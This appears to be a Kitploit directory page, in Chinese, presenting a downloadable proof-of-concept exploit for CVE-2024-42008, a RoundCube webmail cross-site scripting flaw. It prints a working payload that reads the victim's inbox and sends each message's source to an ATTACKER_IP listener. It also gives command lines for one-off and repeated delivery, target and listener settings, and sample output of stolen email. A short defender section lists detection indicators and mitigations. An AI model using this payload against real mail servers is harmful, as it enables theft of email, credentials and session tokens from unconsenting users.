Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Roundcube-CVE-2024-42008-POC — Proof-of-concept exploit for CVE-2024-42008, a Cross-Site Scripting vulnerability in RoundCube webmail. Delivers XSS payloads via contact forms to steal emails, credentials, and session tokens in authorized penetration testing environments. | Kitploit
工具/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
漏洞分析漏洞利用Web应用程序漏洞利用钓鱼攻击CTF学习与教育
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

Proof-of-concept exploit for CVE-2024-42008, a Cross-Site Scripting vulnerability in RoundCube webmail. Delivers XSS payloads via contact forms to steal emails, credentials, and session tokens in authorized penetration testing environments.

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1241年前尚未审核
分享

CVE-2024-42008 RoundCube XSS 漏洞利用

概述

本仓库包含针对 CVE-2024-42008(RoundCube 网络邮件应用中的跨站脚本漏洞)的概念验证利用工具。该工具仅用于教育目的及 HackTheBox 等受控渗透测试环境。

漏洞详情

CVE-2024-42008 摘要

  • CVE ID:CVE-2024-42008
  • 类型:跨站脚本 (XSS)
  • CVSS 评分:高
  • 受影响版本:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • 修复版本:1.5.8, 1.6.8+

技术细节

该漏洞存在于 rcmail_action_mail_get->run() 中,允许远程攻击者在受害者浏览器中执行任意 JavaScript。缺陷源于处理邮件内容时输入验证不足,尤其是在处理 CSS 动画和 JavaScript 执行上下文时。

关键攻击向量:

  • 通过联系表单或邮件消息注入恶意 HTML 内容
  • 利用 CSS 动画属性触发 JavaScript 执行
  • onanimationstart 事件处理程序绕过内容过滤器
  • JavaScript 有效载荷在网络邮件应用上下文中执行

影响

成功利用可使攻击者:

  • 窃取受害者的邮件(收件箱及其他文件夹)
  • 泄露邮件元数据(UID、邮件列表)
  • 访问邮件源码及附件
  • 以受害者身份发送邮件
  • 窃取登录凭据和会话令牌
  • 代表受害者执行操作

利用脚本分析

脚本架构

该利用工具包含三个主要组件:

  1. XSS 有效载荷投递:通过联系表单发送恶意 HTML
  2. HTTP 服务器:监听泄露的数据
  3. 数据处理:捕获并记录窃取的邮件

有效载荷分解

// 核心 XSS 有效载荷使用 CSS 动画触发 JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. 从受害者收件箱获取邮件列表
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. 使用正则表达式提取邮件 UID
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. 对每封邮件,获取完整源码
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. 将邮件数据泄露至攻击者服务器
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

关键特性

  • 持续运行:可按固定间隔发送有效载荷
  • 隐身模式:最小化足迹及错误处理
  • 数据记录:自动捕获并存储泄露的邮件
  • 调试模式:支持代理流量分析
  • 可配置:提供多个命令行选项

使用方法

前提条件

pip install requests

基本用法

# 单次有效载荷投递
python cve-2024-42008-exploit.py

# 持续模式(每30秒一次)
python cve-2024-42008-exploit.py -c

# 自定义间隔(每60秒一次)
python cve-2024-42008-exploit.py -c -i 60

# 调试模式带代理
python cve-2024-42008-exploit.py -d

配置

编辑脚本以配置:

  • ATTACKER_IP:你的监听服务器 IP
  • ATTACKER_PORT:接收泄露数据的端口
  • RECIPIENT_EMAIL:目标邮件地址
  • TARGET_URL:存在漏洞的 RoundCube 实例
  • PROXY:调试用的代理服务器(Burp Suite/Caido)

命令行选项

选项描述
-d, --debug启用调试模式并支持代理
-c, --continuous持续发送有效载荷
-i, --interval有效载荷间隔(默认:30秒)

攻击流程

  1. 有效载荷注入:脚本通过联系表单发送恶意 HTML
  2. 邮件投递:存在漏洞的 RoundCube 处理并投递邮件
  3. 受害者交互:用户打开/查看恶意邮件
  4. XSS 执行:CSS 动画触发 JavaScript 有效载荷
  5. 数据泄露:JavaScript 窃取邮件并发送至攻击者
  6. 数据捕获:利用工具服务器接收并记录窃取的数据

检测与缓解

针对防御者

检测指标:

  • 邮件内容中出现异常 CSS 动画属性
  • HTML 中的 onanimationstart 事件处理程序
  • 邮件消息中可疑的 JavaScript
  • 网络邮件对外部未知域名的出站请求
  • 联系表单的重复提交

缓解策略:

  • 将 RoundCube 更新至 1.5.8 或 1.6.8+
  • 实施内容安全策略 (CSP)
  • 启用邮件内容过滤
  • 监控可疑的出站流量
  • 定期对网络邮件配置进行安全审计

针对渗透测试人员

测试注意事项:

  • 确保测试前已获得适当授权
  • 记录所有活动以供报告
  • 仅在隔离环境中测试
  • 确认目标有意设置为存在漏洞
  • 遵循负责任的披露实践

法律与道德考量

⚠️ 警告:此利用工具仅用于教育和授权测试目的。

  • 仅在你拥有或已获得明确许可的系统上使用
  • 专为 HackTheBox 及类似学习平台设计
  • 未经授权使用可能违反当地及国际法律
  • 始终遵循负责任的披露实践
  • 尊重隐私和数据保护法规

技术参考

  • CVE-2024-42008 官方条目
  • RoundCube 安全公告
  • CWE-79:跨站脚本

输出示例

[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

免责声明

本代码仅用于教育目的和授权渗透测试。作者不对因使用本软件造成的任何滥用或损害负责。在测试任何系统前,请确保已获得适当授权。

下载工具